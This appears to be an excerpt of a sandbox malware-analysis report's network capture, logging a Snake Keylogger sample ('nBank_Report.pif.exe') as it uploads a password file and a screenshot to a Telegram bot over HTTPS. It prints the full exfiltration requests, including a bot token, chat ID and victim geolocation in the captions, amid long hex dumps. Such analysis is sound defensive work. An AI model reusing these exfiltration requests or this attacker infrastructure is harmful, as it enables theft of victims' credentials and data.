                                              2024-09-26 09:34:30 UTC16355OUTData Raw: ed 34 99 f4 8b b4 e2 6e 59 06 91 37 23 be 88 cd 08 40 a9 82 2f 89 4f 90 48 bc ad b2 1d 02 30 93 7d f3 98 55 05 b8 88 4c e0 6d 95 4c f4 cd 22 93 7d 19 ad d8 db 28 99 f4 8b 64 d2 2f 12 05 de 2c 26 84 5e 13 8f 63 63 13 f9 89 e4 5b c4 13 f5 08 30 42 30 93 7c f3 b0 02 30 ca bf 09 09 b8 41 01 18 e3 91 c3 21 00 db d8 20 f9 02 5b 11 80 b3 50 0c 9a ab fc 9b 14 80 eb c2 2e 42 3c ce c5 ea 3d 65 9f 79 31 e6 9a 98 e3 7c 46 94 75 ad c4 53 de 01 7d c7 d9 1a 89 73 71 5e 01 48 6b cc 4a c2 2a 02 7b d1 57 ab fd 7a f9 37 7a d1 75 c3 b1 e0 f6 fb 7f 11 65 1d ad 63 5a 05 60 94 80 cc 29 ff e2 b7 04 33 c8 9f 75 c4 97 3e b1 bd bd 00 8c 79 10 e5 df 2c 10 81 b1 2a 90 18 55 81 11 e3 e6 0b 63 04 22 22 0f b9 67 c5 1f 47 81 11 7c c8 3d 50 fe 99 07 cc 03 fd a9 5b 7b 0b ca 3f 2b fa 3c 22
                                              Data Ascii: 4nY7#@/OH0}ULmL"}(d/,&^cc[0B0|0A! [P.B<=ey1|FuS}sq^HkJ*{Wz7zuecZ`)3u>y,*Uc""gG|=P[{?+<"
                                              2024-09-26 09:34:30 UTC16355OUTData Raw: fe 6b dd 23 df f8 f5 ee d1 6f bc b9 7b f4 5b bf d5 fd cf 7f f4 cd f4 d9 db 41 26 fd 96 21 13 7e 2d 0a c0 4c d6 ed 14 1b 96 80 a9 fc 83 5e d0 4d 80 f4 0b 6d 2f eb a2 c0 9b 16 79 0d ee 75 fe dd f5 7b 7d fc 7e 26 2e f3 80 f8 cd 41 de 71 e2 9b 83 48 c0 f2 f7 2e f2 af 90 dd 36 cc 0d c3 c8 3e a4 5f 94 80 8a 40 a9 c7 85 b9 d9 b8 3c 73 ed bc 7b ca 3f 5b e5 7d e2 8d c2 f1 9b 81 f1 3b 82 85 ad 0a c0 54 e6 2d 60 ad 3c 0f 26 e2 89 74 9b 85 47 86 b7 f3 e8 f0 da 99 e5 bd e6 90 c9 bc cd 90 c9 3f c8 a4 dd 76 92 49 bf 48 26 ed b6 93 69 a1 b7 2c e5 e7 98 c7 3b a7 a5 5f 64 57 00 96 3d e6 b2 2e fb 32 32 e9 17 59 24 00 b7 5b 02 3e d1 04 e0 9e 5f fb 76 a5 15 7c c6 67 cd 0b f2 0f 32 e9 97 81 f0 b3 6d c9 04 20 3c 16 02 70 a3 7b ac fd dc a4 f0 6b c9 a4 5f 24 93 7e 91 9d 16 80 32
                                              Data Ascii: k#o{[A&!~-L^Mm/yu{}~&.AqH.6>_@<s{?[};T-`<&tG?vIH&i,;_dW=.22Y$[>_v|g2m <p{k_$~2
                                              2024-09-26 09:34:30 UTC16355OUTData Raw: fd dd d0 79 13 b0 52 10 d1 47 65 9f 52 cf 3e 72 4f f1 47 4c 29 48 cb d8 98 15 7f c2 18 e9 47 5b 05 df a9 65 bf e7 8f e5 1f 2d 39 cc 73 6c f8 e0 8b cb cf 56 e6 bd 04 84 2a 3d 5a 04 a0 62 4f a9 27 cc 2b f2 5c 47 5f c1 c7 1e 62 9e c4 79 fa ac 45 f4 71 b9 08 d0 8f 42 f0 e0 0b cb ef b3 11 7e f4 15 82 75 dc cb 3a 5a a5 1e ad 55 7f ce 29 ff 84 b9 b6 da 4f 8c 21 17 ad f8 43 fe 29 00 db a3 c0 7e 1f 90 98 b2 0e 81 c7 85 1d de f6 3b 08 be 5e 02 22 dd 20 ca 3c 45 60 a4 9d 57 0e 3a 87 e0 43 00 5a f9 a7 fc 53 0c 46 39 28 4a 42 f0 7d ac 4a e4 9d a2 00 ac 92 af af 56 04 e5 df 10 3b 66 2c f2 a2 e4 43 e6 f9 0d c0 4c ec 39 36 df 18 90 0f 4a 3e e7 b3 9c 4a c9 43 bc 29 f9 40 79 c7 1c fd 38 6e f1 db 81 5c 26 c2 98 3e 2d 6b 10 7d 1c f3 a5 8f f0 23 4e cc e7 b0 27 63 f7 6a 61 ae
                                              Data Ascii: yRGeR>rOGL)HG[e-9slV*=ZbO'+\G_byEqB~u:ZU)O!C)~;^" <E`W:CZSF9(JB}JV;f,CL96J>JC)@y8n\&>-k}#N'cja
                                              2024-09-26 09:34:30 UTC16355OUTData Raw: c8 39 84 9e 44 1d 73 48 3c 49 3d 0f 79 eb f7 b6 9f b3 b5 5a a7 be 17 7c ac a7 95 44 64 5e e3 a6 ff 25 6b 7b 15 7f 5e fc 51 f1 a7 be c6 42 eb 26 2e 00 21 12 65 cf 57 22 e9 e7 e9 97 6d f3 89 d6 8c 43 b4 e7 78 20 eb 96 83 66 7f 2f 00 5f c8 12 30 92 7f 10 ca be 88 40 f6 45 44 92 6e 18 d1 1e 9e 68 8d 67 90 88 f3 92 6e 39 a9 5f 77 a5 89 a4 9f 27 96 7e 1e fb 1c 4b a0 53 d1 c6 2f b6 f7 e7 e8 5e 34 08 fb 39 8f 40 28 03 81 8a bd 8b ec cf fb 20 bc 18 f4 14 39 88 ec 9b bd 84 8b 43 1a 09 38 f7 89 94 f1 95 81 d3 5b 79 76 a0 fd 7d 97 5f cf 3e 5b 3e 22 ac 8a 40 a4 20 7d e3 02 fb 3e cf 6f c8 63 71 8e e5 0d 22 92 76 02 49 17 c5 c7 a1 12 7e 35 a1 f4 f3 04 d2 ad 9f de 05 1f 8b 23 da 73 74 22 a9 37 0e 5e f4 0d 62 55 00 da eb ae 0a c0 b1 58 39 01 b8 44 4e 89 c5 de b8 f8 63 c1
                                              Data Ascii: 9DsH<I=yZ|Dd^%k{^QB&.!eW"mCx f/_0@EDnhgn9_w'~KS/^49@( 9C8[yv}_>[>"@ }>ocq"vI~5#st"7^bUX9DNc
                                              2024-09-26 09:34:30 UTC16355OUTData Raw: a3 8f a8 f3 c2 6e 6e 1f cb d9 d3 e6 8b ec 63 cc 3c e3 7c 69 07 d2 ce 72 25 fe 88 7b 61 a8 b8 a4 1f 6b 69 95 e3 e7 e8 eb 96 5f 2f f2 40 c2 ce 0b c2 7a 4e e3 2c ea 0c 62 7e bf 5a 1a 4a fe f9 18 95 7e b4 bc 8e e6 59 ab 31 cf f2 93 70 43 be 49 f0 49 c4 f9 2a 3f 72 98 63 8d 17 86 9a f7 e2 cf af 51 9f b8 88 62 3e 3e 59 01 88 90 fb e8 f5 c9 fe 8e 4e e9 e6 2f da 7f 5c af 68 64 dd 24 44 dd b9 df 49 9d f7 de 96 ae 4c 8f a5 8d 1f b8 a8 79 c6 1f 12 30 ca 15 63 4a c3 3e 21 17 cc d5 31 cf d4 67 ec 1f 63 55 cc ef b7 10 12 6d cb 4d 24 cf 20 ca 89 62 bb 2a 91 ac 5b 2a d3 9f b2 7f d4 17 14 8b e4 dc 4a 10 4a 3f 4f 20 ed 86 11 c9 b8 28 4f 44 f9 93 20 92 7d 11 a1 f4 f3 04 52 6d 18 91 c4 5b 0a d1 6b 8c 43 24 fd 3c 91 b4 9b 24 91 f4 f3 44 a2 6f 10 b1 a0 5b 6e ec 67 b0 04 01 d8
                                              Data Ascii: nnc<|ir%{aki_/@zN,b~ZJ~Y1pCII*?rcQb>>YN/\hd$DILy0cJ>!1gcUmM$ b*[*JJ?O (OD }Rm[kC$<$Do[ng
                                              2024-09-26 09:34:30 UTC16355OUTData Raw: 61 3f e5 f8 bd 04 92 ce 1f df f5 92 0f 38 c6 4b ab 79 55 fb 69 5e 55 82 1a 93 e3 f7 5b 15 80 81 14 7b 21 11 4a b9 15 c4 cb b4 9d 45 24 e6 46 cd 5b 2a 91 f4 f3 c4 52 6f 1c ec bd 2f 23 ab 02 d0 7e 8e 63 30 6f 8f 40 ea 8d 43 24 eb 96 83 5a e4 0d a2 16 74 0b cd 2f 99 40 ca ad 24 a1 e0 73 0c bc 5c 44 f2 af 8c a7 ca 25 22 35 cf 77 01 98 2b f4 0a dd 73 6d 3f 2f 00 c5 79 36 06 57 15 d8 56 06 9e 6f 20 f7 2e b4 ff c6 6f 7a 3a 75 37 73 bb f0 33 69 fa e2 67 d3 ec 45 cf a6 35 17 53 15 f8 cb b4 7e 6b 4a bb 6d 4b 69 dd 96 94 d6 6c 7e 36 4d 9d 6f f9 bc 8e 7f 6e 20 b2 2f 0b 3f 27 fa 90 81 12 84 5e fe 65 8a cc 3b e3 c1 81 48 04 0e 22 94 7a e3 10 48 bb 49 12 49 3f 4f 24 fd 3c a1 f4 73 44 cf fd f3 44 72 6f 14 06 09 40 78 3e 09 c0 2c e9 5c f5 5f 4d 2d f4 16 4b 24 01 01 09 58
                                              Data Ascii: a?8KyUi^U[{!JE$F[*Ro/#~c0o@C$Zt/@$s\D%"5w+sm?/y6WVo .oz:u7s3igE5S~kJmKil~6Mon /?'^e;H"zHII?O$<sDDro@x>,\_M-K$X
                                              2024-09-26 09:34:31 UTC389INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:31 GMT
                                              Content-Type: application/json
                                              Content-Length: 1230
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              41192.168.2.1049770149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:32 UTC348OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dce2bd0102c9b7
                                              Host: api.telegram.org
                                              Content-Length: 546
                                              Connection: Keep-Alive
                                              2024-09-26 09:34:32 UTC546OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 32 62 64 30 31 30 32 63 39 62 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 62 72 6f 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 35 3a 33 33 3a 32 31 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20 38
                                              Data Ascii: --------------------------8dce2bd0102c9b7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:585948Date and Time: 26/09/2024 / 05:33:21Client IP: 8
                                              2024-09-26 09:34:33 UTC388INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:32 GMT
                                              Content-Type: application/json
                                              Content-Length: 505
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-09-26 09:34:33 UTC505INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 33 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 32 34 30 31 32 38 34 32 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 58 6d 61 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6d 61 6e 75 5f 4c 6f 67 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 33 39 34 35 35 30 32 34 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 20 5c 75 64 38 33 64 5c 75 64 63 30 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 36 37 35 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 33 32 37 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22
                                              Data Ascii: {"ok":true,"result":{"message_id":6353,"from":{"id":6240128422,"is_bot":true,"first_name":"Xmas","username":"Mmanu_LogBot"},"chat":{"id":1394550246,"first_name":"Walton \ud83d\udc08","username":"Walton675","type":"private"},"date":1727343272,"document":{"


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              42192.168.2.1049771149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:33 UTC694OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dce31ecada4aca
                                              Host: api.telegram.org
                                              Content-Length: 673762
                                              2024-09-26 09:34:33 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 33 31 65 63 61 64 61 34 61 63 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 44 6f 63 75 6d 65 6e 74 73 5c 53 6e 61 6b 65 4b 65 79 6c 6f 67 67 65 72 5c 53 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00
                                              Data Ascii: --------------------------8dce31ecada4acaContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\SnakeKeylogger\Screenshot.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGB
                                              2024-09-26 09:34:33 UTC16355OUTData Raw: 70 2b 00 3f 5d fd f6 de fd 43 91 37 57 22 89 b7 ae 38 f1 c4 13 ab 17 7f fb db 50 fc c1 3b be fb 50 8f dc fb ef 6b ee ac 3e 76 ce 23 d5 0f 7e f2 74 96 7c 79 4c 7c ec ec 87 73 4e 75 af 3d fa 9e d9 02 b0 91 7f ad 00 3c fc f0 50 e0 cd 97 45 01 b8 b0 84 12 6f 3e 2c 0a c0 b1 88 a4 de 38 44 d2 cf 89 a4 9f 13 49 3f 27 92 7d 83 88 e4 de 28 bc 54 02 50 44 72 6f 14 22 f9 07 bf 2f 02 50 eb 45 01 18 f3 fb 2e 00 a3 6b c1 4e 17 a9 37 00 c9 3f 51 0a c0 48 fa 39 4b 02 d9 e7 44 e2 cf 51 27 60 3f 4a d1 27 fa c5 95 f3 f5 30 01 18 31 f5 d6 9b 7a e8 97 ef 27 02 3d ee 02 50 12 50 f3 48 f4 0d 93 80 3d f9 37 5d df 8a 3f 97 80 8c ea 06 e4 ad c0 ed 4b 39 9a 8e 40 31 aa 04 74 b1 87 ec 93 50 94 08 24 5e 4a 45 e6 fe 0c 40 49 c0 ee 6e 57 65 3a ab af 6c e5 1e e8 3a b0 83 e4 53 5e d2 cf
                                              Data Ascii: p+?]C7W"8P;Pk>v#~t|yL|sNu=<PEo>,8DI?'}(TPDro"/PE.kN7?QH9KDQ'`?J'01z'=PPH=7]?K9@1tP$^JE@InWe:l:S^
                                              2024-09-26 09:34:33 UTC16355OUTData Raw: 27 99 c7 1c 5c e2 b5 22 af 41 39 e5 d5 fd a7 58 b9 8f b7 01 23 f5 b8 ee 2b f1 27 d1 e7 73 49 3f 09 43 49 43 64 9e 04 a0 3a 00 91 7d 8c 90 af f9 36 22 b0 ec 0a 24 87 dc 93 d8 93 00 94 dc 23 07 ca a9 03 d0 af 00 4b fc 39 2e e9 94 97 d8 5b b1 7d fa 6e 29 a7 1a 09 c3 72 af f6 79 9e 98 20 c6 35 60 c9 39 5d fb 45 ca b9 00 94 d4 d3 5c 48 f0 11 77 d9 a7 5a c5 bd ab 50 67 13 17 ea f4 03 e6 92 74 c8 39 49 3d e5 5d 00 32 92 07 f6 d1 d1 c7 28 c1 47 2d 75 c4 a9 25 a6 33 34 47 14 ea 85 1f 92 76 42 02 2e 5a 4b d2 29 ee 35 ea 1c 64 2c cf 50 8d f6 e8 0c cd 91 7c 82 b5 ea b8 fa db d9 f0 dc 3c d7 77 05 e6 48 36 90 84 73 11 07 08 40 09 3e 72 de a9 a7 7a 9d 51 9e a3 b5 ce 61 ae ce 3e ce d4 da af 14 eb 5c c6 dc 1d b8 71 fa f9 37 48 bf af a6 e3 0f f1 c7 a8 39 42 cf 5f f4 21 d9
                                              Data Ascii: '\"A9X#+'sI?CICd:}6"$#K9.[}n)ry 5`9]E\HwZPgt9I=]2(G-u%34GvB.ZK)5d,P|<wH6s@>rzQa>\q7H9B_!
                                              2024-09-26 09:34:33 UTC16355OUTData Raw: c5 5c bf f8 a4 89 a4 9f 13 49 3f 27 92 78 f3 21 92 78 f3 21 92 7e 4e 24 f4 c6 21 92 7a e3 10 49 be 41 f4 c8 bb 49 10 49 bd 71 08 84 5f 49 24 ee 26 45 24 fd 9c 48 e4 cd 95 59 02 30 51 0a bd 88 1e a1 d7 27 de 8f 48 f2 0d 22 92 7c 83 88 44 de 5c 79 b5 09 c0 51 98 25 f4 02 e9 e7 cc aa 1f 83 59 02 30 11 8b bd 51 99 bf 00 9c fe c8 dc c4 9f 70 29 17 11 9d e9 f9 ee 87 7a c9 b1 40 fe 95 cc 74 01 f6 8a 3f 11 c9 bc b9 10 49 3f 27 92 7c 83 90 f8 eb be e7 c7 99 48 fa 39 33 9d 7e 33 b8 cc 9b 3f b3 a5 9f d3 4f 00 82 64 1e 44 79 70 e1 57 0a 40 40 f4 2d d9 2f 7d 4e 42 02 b0 fb 96 54 97 46 49 c1 be a4 fd 12 7d fd 04 a0 84 9f bf 10 c4 c9 12 0f 09 87 b8 43 c4 21 e9 10 70 29 4e 87 a0 72 fd 68 3b fe 4c de 49 e8 29 5e a2 9c ba 0a 15 f3 1a 09 be 48 00 ea 6a b1 04 a0 04 1f a3 cf
                                              Data Ascii: \I?'x!x!~N$!zIAIIq_I$&E$HY0Q'H"|D\yQ%Y0Qp)z@t?I?'|H93~3?OdDypW@@-/}NBTFI}C!p)Nrh;LI)^Hj
                                              2024-09-26 09:34:33 UTC16355OUTData Raw: ed 34 99 f4 8b b4 e2 6e 59 06 91 37 23 be 88 cd 08 40 a9 82 2f 89 4f 90 48 bc ad b2 1d 02 30 93 7d f3 98 55 05 b8 88 4c e0 6d 95 4c f4 cd 22 93 7d 19 ad d8 db 28 99 f4 8b 64 d2 2f 12 05 de 2c 26 84 5e 13 8f 63 63 13 f9 89 e4 5b c4 13 f5 08 30 42 30 93 7c f3 b0 02 30 ca bf 09 09 b8 41 01 18 e3 91 c3 21 00 db d8 20 f9 02 5b 11 80 b3 50 0c 9a ab fc 9b 14 80 eb c2 2e 42 3c ce c5 ea 3d 65 9f 79 31 e6 9a 98 e3 7c 46 94 75 ad c4 53 de 01 7d c7 d9 1a 89 73 71 5e 01 48 6b cc 4a c2 2a 02 7b d1 57 ab fd 7a f9 37 7a d1 75 c3 b1 e0 f6 fb 7f 11 65 1d ad 63 5a 05 60 94 80 cc 29 ff e2 b7 04 33 c8 9f 75 c4 97 3e b1 bd bd 00 8c 79 10 e5 df 2c 10 81 b1 2a 90 18 55 81 11 e3 e6 0b 63 04 22 22 0f b9 67 c5 1f 47 81 11 7c c8 3d 50 fe 99 07 cc 03 fd a9 5b 7b 0b ca 3f 2b fa 3c 22
                                              Data Ascii: 4nY7#@/OH0}ULmL"}(d/,&^cc[0B0|0A! [P.B<=ey1|FuS}sq^HkJ*{Wz7zuecZ`)3u>y,*Uc""gG|=P[{?+<"
                                              2024-09-26 09:34:33 UTC16355OUTData Raw: fe 6b dd 23 df f8 f5 ee d1 6f bc b9 7b f4 5b bf d5 fd cf 7f f4 cd f4 d9 db 41 26 fd 96 21 13 7e 2d 0a c0 4c d6 ed 14 1b 96 80 a9 fc 83 5e d0 4d 80 f4 0b 6d 2f eb a2 c0 9b 16 79 0d ee 75 fe dd f5 7b 7d fc 7e 26 2e f3 80 f8 cd 41 de 71 e2 9b 83 48 c0 f2 f7 2e f2 af 90 dd 36 cc 0d c3 c8 3e a4 5f 94 80 8a 40 a9 c7 85 b9 d9 b8 3c 73 ed bc 7b ca 3f 5b e5 7d e2 8d c2 f1 9b 81 f1 3b 82 85 ad 0a c0 54 e6 2d 60 ad 3c 0f 26 e2 89 74 9b 85 47 86 b7 f3 e8 f0 da 99 e5 bd e6 90 c9 bc cd 90 c9 3f c8 a4 dd 76 92 49 bf 48 26 ed b6 93 69 a1 b7 2c e5 e7 98 c7 3b a7 a5 5f 64 57 00 96 3d e6 b2 2e fb 32 32 e9 17 59 24 00 b7 5b 02 3e d1 04 e0 9e 5f fb 76 a5 15 7c c6 67 cd 0b f2 0f 32 e9 97 81 f0 b3 6d c9 04 20 3c 16 02 70 a3 7b ac fd dc a4 f0 6b c9 a4 5f 24 93 7e 91 9d 16 80 32
                                              Data Ascii: k#o{[A&!~-L^Mm/yu{}~&.AqH.6>_@<s{?[};T-`<&tG?vIH&i,;_dW=.22Y$[>_v|g2m <p{k_$~2
                                              2024-09-26 09:34:33 UTC16355OUTData Raw: fd dd d0 79 13 b0 52 10 d1 47 65 9f 52 cf 3e 72 4f f1 47 4c 29 48 cb d8 98 15 7f c2 18 e9 47 5b 05 df a9 65 bf e7 8f e5 1f 2d 39 cc 73 6c f8 e0 8b cb cf 56 e6 bd 04 84 2a 3d 5a 04 a0 62 4f a9 27 cc 2b f2 5c 47 5f c1 c7 1e 62 9e c4 79 fa ac 45 f4 71 b9 08 d0 8f 42 f0 e0 0b cb ef b3 11 7e f4 15 82 75 dc cb 3a 5a a5 1e ad 55 7f ce 29 ff 84 b9 b6 da 4f 8c 21 17 ad f8 43 fe 29 00 db a3 c0 7e 1f 90 98 b2 0e 81 c7 85 1d de f6 3b 08 be 5e 02 22 dd 20 ca 3c 45 60 a4 9d 57 0e 3a 87 e0 43 00 5a f9 a7 fc 53 0c 46 39 28 4a 42 f0 7d ac 4a e4 9d a2 00 ac 92 af af 56 04 e5 df 10 3b 66 2c f2 a2 e4 43 e6 f9 0d c0 4c ec 39 36 df 18 90 0f 4a 3e e7 b3 9c 4a c9 43 bc 29 f9 40 79 c7 1c fd 38 6e f1 db 81 5c 26 c2 98 3e 2d 6b 10 7d 1c f3 a5 8f f0 23 4e cc e7 b0 27 63 f7 6a 61 ae
                                              Data Ascii: yRGeR>rOGL)HG[e-9slV*=ZbO'+\G_byEqB~u:ZU)O!C)~;^" <E`W:CZSF9(JB}JV;f,CL96J>JC)@y8n\&>-k}#N'cja
                                              2024-09-26 09:34:33 UTC16355OUTData Raw: c8 39 84 9e 44 1d 73 48 3c 49 3d 0f 79 eb f7 b6 9f b3 b5 5a a7 be 17 7c ac a7 95 44 64 5e e3 a6 ff 25 6b 7b 15 7f 5e fc 51 f1 a7 be c6 42 eb 26 2e 00 21 12 65 cf 57 22 e9 e7 e9 97 6d f3 89 d6 8c 43 b4 e7 78 20 eb 96 83 66 7f 2f 00 5f c8 12 30 92 7f 10 ca be 88 40 f6 45 44 92 6e 18 d1 1e 9e 68 8d 67 90 88 f3 92 6e 39 a9 5f 77 a5 89 a4 9f 27 96 7e 1e fb 1c 4b a0 53 d1 c6 2f b6 f7 e7 e8 5e 34 08 fb 39 8f 40 28 03 81 8a bd 8b ec cf fb 20 bc 18 f4 14 39 88 ec 9b bd 84 8b 43 1a 09 38 f7 89 94 f1 95 81 d3 5b 79 76 a0 fd 7d 97 5f cf 3e 5b 3e 22 ac 8a 40 a4 20 7d e3 02 fb 3e cf 6f c8 63 71 8e e5 0d 22 92 76 02 49 17 c5 c7 a1 12 7e 35 a1 f4 f3 04 d2 ad 9f de 05 1f 8b 23 da 73 74 22 a9 37 0e 5e f4 0d 62 55 00 da eb ae 0a c0 b1 58 39 01 b8 44 4e 89 c5 de b8 f8 63 c1
                                              Data Ascii: 9DsH<I=yZ|Dd^%k{^QB&.!eW"mCx f/_0@EDnhgn9_w'~KS/^49@( 9C8[yv}_>[>"@ }>ocq"vI~5#st"7^bUX9DNc
                                              2024-09-26 09:34:33 UTC16355OUTData Raw: a3 8f a8 f3 c2 6e 6e 1f cb d9 d3 e6 8b ec 63 cc 3c e3 7c 69 07 d2 ce 72 25 fe 88 7b 61 a8 b8 a4 1f 6b 69 95 e3 e7 e8 eb 96 5f 2f f2 40 c2 ce 0b c2 7a 4e e3 2c ea 0c 62 7e bf 5a 1a 4a fe f9 18 95 7e b4 bc 8e e6 59 ab 31 cf f2 93 70 43 be 49 f0 49 c4 f9 2a 3f 72 98 63 8d 17 86 9a f7 e2 cf af 51 9f b8 88 62 3e 3e 59 01 88 90 fb e8 f5 c9 fe 8e 4e e9 e6 2f da 7f 5c af 68 64 dd 24 44 dd b9 df 49 9d f7 de 96 ae 4c 8f a5 8d 1f b8 a8 79 c6 1f 12 30 ca 15 63 4a c3 3e 21 17 cc d5 31 cf d4 67 ec 1f 63 55 cc ef b7 10 12 6d cb 4d 24 cf 20 ca 89 62 bb 2a 91 ac 5b 2a d3 9f b2 7f d4 17 14 8b e4 dc 4a 10 4a 3f 4f 20 ed 86 11 c9 b8 28 4f 44 f9 93 20 92 7d 11 a1 f4 f3 04 52 6d 18 91 c4 5b 0a d1 6b 8c 43 24 fd 3c 91 b4 9b 24 91 f4 f3 44 a2 6f 10 b1 a0 5b 6e ec 67 b0 04 01 d8
                                              Data Ascii: nnc<|ir%{aki_/@zN,b~ZJ~Y1pCII*?rcQb>>YN/\hd$DILy0cJ>!1gcUmM$ b*[*JJ?O (OD }Rm[kC$<$Do[ng
                                              2024-09-26 09:34:33 UTC16355OUTData Raw: 61 3f e5 f8 bd 04 92 ce 1f df f5 92 0f 38 c6 4b ab 79 55 fb 69 5e 55 82 1a 93 e3 f7 5b 15 80 81 14 7b 21 11 4a b9 15 c4 cb b4 9d 45 24 e6 46 cd 5b 2a 91 f4 f3 c4 52 6f 1c ec bd 2f 23 ab 02 d0 7e 8e 63 30 6f 8f 40 ea 8d 43 24 eb 96 83 5a e4 0d a2 16 74 0b cd 2f 99 40 ca ad 24 a1 e0 73 0c bc 5c 44 f2 af 8c a7 ca 25 22 35 cf 77 01 98 2b f4 0a dd 73 6d 3f 2f 00 c5 79 36 06 57 15 d8 56 06 9e 6f 20 f7 2e b4 ff c6 6f 7a 3a 75 37 73 bb f0 33 69 fa e2 67 d3 ec 45 cf a6 35 17 53 15 f8 cb b4 7e 6b 4a bb 6d 4b 69 dd 96 94 d6 6c 7e 36 4d 9d 6f f9 bc 8e 7f 6e 20 b2 2f 0b 3f 27 fa 90 81 12 84 5e fe 65 8a cc 3b e3 c1 81 48 04 0e 22 94 7a e3 10 48 bb 49 12 49 3f 4f 24 fd 3c a1 f4 73 44 cf fd f3 44 72 6f 14 06 09 40 78 3e 09 c0 2c e9 5c f5 5f 4d 2d f4 16 4b 24 01 01 09 58
                                              Data Ascii: a?8KyUi^U[{!JE$F[*Ro/#~c0o@C$Zt/@$s\D%"5w+sm?/y6WVo .oz:u7s3igE5S~kJmKil~6Mon /?'^e;H"zHII?O$<sDDro@x>,\_M-K$X
                                              2024-09-26 09:34:35 UTC389INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
